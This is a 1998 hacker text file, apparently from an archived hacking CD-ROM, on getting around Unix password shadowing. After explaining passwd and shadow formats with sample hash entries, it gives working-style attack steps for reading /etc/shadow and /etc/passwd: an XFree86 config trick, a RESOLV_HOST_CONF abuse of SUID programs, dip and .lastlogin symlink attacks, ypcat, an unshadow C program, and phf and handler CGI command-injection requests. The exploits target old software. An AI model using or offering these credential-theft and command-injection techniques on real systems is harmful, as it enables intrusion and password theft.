home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacker's Arsenal - The Cutting Edge of Hacking
/
Hacker's Arsenal - The Cutting Edge of Hacking.iso
/
texts
/
nix
/
shadow.txt
< prev
next >
Wrap
Text File
|
2001-07-11
|
6KB
|
173 lines
The Shadowed Passwd
by The Arctic League - http://arctik.com
In the old days hacking was easy. You get an account on a system, download the passwd
file, and crack the passwords. As you may have noticed everyone figured out that unshadowed
passwd files were not as secure as they thought. So some at (find where) invented the idea of
shadowed passwds. With a non-shadowed passwd file the file /etc/passwd looks like this:
root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
Quick little note about the normal passwd file:
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1 :2 :3 :4 :5 :6 :7
1=username 2=encrypted password 3=user number 4=groop id 5=real name
6=home directory 7=shell
On a system with passwd shadowing it would look like this:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
man:x:13:15:man:/usr/man:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:x:-2:100:nobody:/dev/null:
ftp:x:404:1::/home/ftp:/bin/bash
guest:x:405:100:guest:/dev/null:/dev/null
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
This type of passwd file is impossable to crack, for the simple resion that there is nothing to crack!
The real encrypted passwords are stored in different files on different systems, but the most common
is in /etc/shadow.
/etc/shadow will look something like this:
root:R0rmc6lxVwi5I:10441:0:99999:7:::
bin:*:10441:0:99999:7:::
daemon:*:10441:0:99999:7:::
adm:*:10441:0:99999:7:::
lp:*:10441:0:99999:7:::
sync:*:10441:0:99999:7:::
shutdown:*:10441:0:99999:7:::
halt:*:10441:0:99999:7:::
mail:*:10441:0:99999:7:::
news:*:10441:0:99999:7:::
uucp:*:10441:0:99999:7:::
operator:*:10441:0:99999:7:::
games:*:10441:0:99999:7:::
gopher:*:10441:0:99999:7:::
ftp:*:10441:0:99999:7:::
nobody:*:10441:0:99999:7:::
mary:EauDLA/PT/HQg:10441:0:99999:7:::
bhilton:LkjLiWy08xIWY:10446:-1:-1:-1:-1:-1:134529076
There are many ways to unshadow a shadowed passwd file. I will go over a few of them here.
The First way to get the /etc/shadow file on a linux system is to do the command:
XF86_SVGA -config /etc/shadow
Because of a bug in some versions of the configurater it will echo /etc/shadow to your term.
This bug is in almost all Linux Slackware 3.3 systems and maybe anything that runs XFREE86.
In most linux versions there is a hole in libc 5.4.7 or less, that let you set your
resolv_hots_conf to any file on the system. If you were then to run a SUID program that uses
resolv_host_conf, ping for example, it would cat the file to you.
One of these files will be suid:
ping, traceroute, rlogin, or, ssh
1. Type bash to start a bash shell
2. Type: export RESOLV_HOST_CONF=/etc/shadow
3. Type one of the file names above with asdf, like this: ping asdf
It should cat the shadowed passwd file for you.
Note: you can replace /etc/shadow with any file you want to read.
On some Linux Slackwares you can use dip to exploit root, it can also be used to get the
shadow file.
ln -s /etc/shadow /tmp/dummy.dip /sbin/dip -v /tmp/dummy.dip
If dip is vulnerable this will type the shadow file.
An old SCO and Sys V trick is the .lastlogin hack. Check to see that
in your home directory, the .lastlogin file is owned by auth or root.
To exploit:
rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd
Now logout and then back in so you create the link.
cat .lastlogin > passwd
rm -f ~/.lastlogin
Another old trick that still works once and a while is the ypcat hack. It works on some
SunOS, SCO, and System Vs. To use it simply type ypcat /etc/passwd with your capture
option turned on.
The most widly known shadow hack is using lots of calls to the pw_*'s to get the file.
The unshadow C program works on some versions of Unix, mostly on the same ones
that ypcat works on.
-------unshadow.c cut here----------------
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
---------End here------------------
Web & cgi exploits:
Any OS running a web server with /cgi-bin/phf executable is open to attack. The phf cgi calls
the program ph, if you send a CR char to it, it will let you execute commands on the system.
(This is a remote hack)
http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd
or
http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd
Any OS (Usually IRIX) running a web server with /cgi-bin/handler executable is hackable.
telnet target.machine.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
HTTP/1.0
Remember to use a TAB character after cat.
(c)1998, The Arctic League - http://arctik.com
